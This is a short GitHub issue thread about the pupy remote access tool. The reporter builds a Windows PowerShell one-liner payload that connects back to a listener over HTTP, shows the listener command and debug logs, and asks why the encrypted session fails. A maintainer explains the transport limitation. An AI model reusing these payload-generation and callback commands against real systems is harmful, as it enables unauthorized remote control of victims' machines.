### ISSUE TITLE
issue : data received but enc_cipher is not available yet

### ISSUE THREAD

**Issue by kfr-ma** [n1nj4sec/pupy#629]
hi everybody, 

while runing the client rat , on the pupysh i have the error 

data received but enc_cipher is not available yet

i have already tried to change the cipher ,  but the same error  .

any help is welcome .

I generate the rate with 

./pupygen.py -f ps1_oneliner -O windows -A x86 --randomize-hash --oneliner-listen-port 8088 connect  --host xx:yy:zz:xx :8088  -t http

I wait for the shell with this command 

./pupysh.py --log-lvl DEBUG -t http  --port 8088

and i have this error 

>> INFO:PUPY/8088:accepted ('::ffff:xxxxxx', 49878, 0, 0) with fd 11
DEBUG:PUPY/8088:::ffff:ssss:49878 Wait for authentication result
DEBUG:PUPY/8088:::ffff:xxxx:49878 Authenticated. Starting connection
DEBUG:PUPY/8088:::ffff:cccc:49878 Connection complete
DEBUG:PUPY/8088:::ffff:wwww:49878 Report connection: <network.lib.connection.PupyConnection '::ffff:zzzzz:49878' object at 0x7fdcf6dfc050>
DEBUG:PUPY/8088:::ffff:ggggg:49878 Wait complete: <network.lib.connection.PupyConnection '::ffff:41.207.2.92:49878' object at 0x7fdcf6dfc050>
DEBUG:PUPY/8088:{}:{} Initializing service...
DEBUG:root:data received but enc_cipher is not available yet 

Thx you in adavance .

**Comment by alxchk** [comment]
AFAIR http transport is a bit broken in this branch. Right now pupy doesn't have stable support for half-duplex channels like http. In this branch http transport simply wraps packets with HTTP headers, but didn't honor the protocol. So in case you try to communicate via HTTP proxy this will never work. You can try to use branch (https://github.com/alxchk/pupy/). http transport was rewritten there, so it may work via proxy. But it's very slow. Best choice to use websocket transport if it's not possible to use ec4/rsa.

**Comment by s1st3r** [comment]
And try to hide that IP from Ivory Coast...

**Comment by kfr-ma** [comment]
Hi ,

Ah Ok Thx you 

Regards.
